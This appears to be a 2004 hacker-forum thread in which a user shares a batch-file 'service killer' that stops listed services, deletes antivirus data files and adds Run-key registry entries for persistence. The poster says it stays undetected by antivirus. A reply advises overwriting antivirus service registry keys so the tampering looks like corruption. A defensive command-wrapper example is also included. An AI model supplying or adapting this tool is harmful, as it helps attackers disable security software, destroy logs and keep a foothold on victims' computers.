kbnet
Here's an update for the service killer (it still remains undetected by antiviruses).

It is now capable of deleting log files and adding keys to the registry (it will overwrite keys
if they already exist).


Here is the main code:

Controller.bat
-=--=-=-=-=-=-
@echo off
REM One entry per line in each .lst file. For every list: the first line is skipped
REM (skip=1, hence the blank line at the top), lines starting with > are treated as
REM comments (eol=>), and the whole line is handed over as a single token (delims=).
SET SRV_LST=services.lst
SET DEL_LOG=logs.lst
SET REG_MOD=regmods.lst

REM Stop every service named in services.lst; /y answers yes to the dependent-service prompt.
FOR /F "skip=1 eol=> tokens=1 delims=" %%a IN (%SRV_LST%) DO (@net stop %%a /y)
REM Delete every path or wildcard listed in logs.lst, recursing into subdirectories (/s).
FOR /F "skip=1 eol=> tokens=1 delims=" %%b IN (%DEL_LOG%) DO (@del %%b /s)
REM Add each "key /v name /t type /d data" line from regmods.lst; /f overwrites without prompting.
FOR /F "skip=1 eol=> tokens=1 delims=" %%c IN (%REG_MOD%) DO (@reg add %%c /f)
-=-=-=-=-=-=-==

! Make sure you leave a blank line at the top of the log files !

Example of logs.lst:
-=-=-=-=-

c:\*ANTI-VIR*.DAT
c:\*CHKLIST*.DAT
=-=-=-=-=

Example of regmods.lst (keep these reg keys one per line; these keys will be added to the registry):
-=-=-=-=-

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v loadcalc /t REG_SZ /d calc.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v loadnote /t REG_SZ /d notepad.exe
-=-=-=-=-

If anyone puts together some good log files, let me know.

Cheers
untouchable
Nice idea man, thanks for the share :)

kbnet
What a lot of you should note about things like this is that you should replace a lot of your Windows commands. For example, I've replaced commands such as reg.exe and format.com on my system with my own versions so I can capture any parameters which are sent to them. Then I can decide whether I would still like to execute them.

If anyone has any more suggestions for developing my service killer script further, please let me know.
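The command-wrapper idea kbnet describes above, written out as an added example (this is not kbnet's own wrapper, which is not posted in the thread). It assumes a hypothetical reg.cmd placed in a directory that appears in PATH before %SystemRoot%\System32: cmd.exe searches PATH directories in order, so a script that runs plain "reg add ..." (like Controller.bat) hits the wrapper instead of the real reg.exe. The log path cmdwrap.log and the default-deny behaviour are choices made for this example.

```batch
@echo off
REM reg.cmd -- hypothetical wrapper that shadows reg.exe (added example, not
REM kbnet's wrapper). Put it in a PATH directory searched before
REM %SystemRoot%\System32 so that "reg ..." resolves here first.
setlocal
set LOGFILE=%SystemDrive%\cmdwrap.log
set REAL=%SystemRoot%\System32\reg.exe

REM 1. Capture the complete argument list with a timestamp before anything runs.
echo %date% %time% [reg] %* >> "%LOGFILE%"

REM 2. Ask the console user whether to let the call through. ANSWER is
REM    preset to "n", and set /p leaves it untouched on an empty line or
REM    on EOF, so a non-interactive caller is denied by default.
set ANSWER=n
set /p ANSWER=Allow "reg %*"? [y/N] 
if /i not "%ANSWER%"=="y" (
    echo reg: call denied by wrapper, logged to "%LOGFILE%"
    exit /b 1
)

REM 3. Approved: pass the unmodified arguments to the real binary and
REM    return its exit code to the caller.
"%REAL%" %*
exit /b %ERRORLEVEL%
```

Two caveats a practitioner would want: the wrapper only intercepts callers that resolve "reg" through PATH, so anything invoking %SystemRoot%\System32\reg.exe by full path, or talking to the registry APIs directly rather than through reg.exe, goes straight past it; and because the decision is an interactive prompt, it is a tripwire for scripts run on your own machine, not a replacement for proper access control on the registry keys themselves.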
st3@1th
QUOTE(kbnet @ Oct 29 2004, 10:10 PM)
What a lot of you should note about things like this is that you should replace a lot of your Windows commands. For example, I've replaced commands such as reg.exe and format.com on my system with my own versions so I can capture any parameters which are sent to them. Then I can decide whether I would still like to execute them.

While you're at it, replace the net stop command with a better service editing tool that will let you disable the service altogether instead of just stopping it.

If you wanted to really do something useful, research the registry service keys for the major AV products and then include those in your script. If you overwrite enough of them it will look like the service got corrupted rather than just stopped, which is more suspicious.

BTW, saying that it is undetected by AVs is a little absurd; it's not mobile code or even malicious for that matter. Almost any installation will start and stop services, modify the registry, etc.
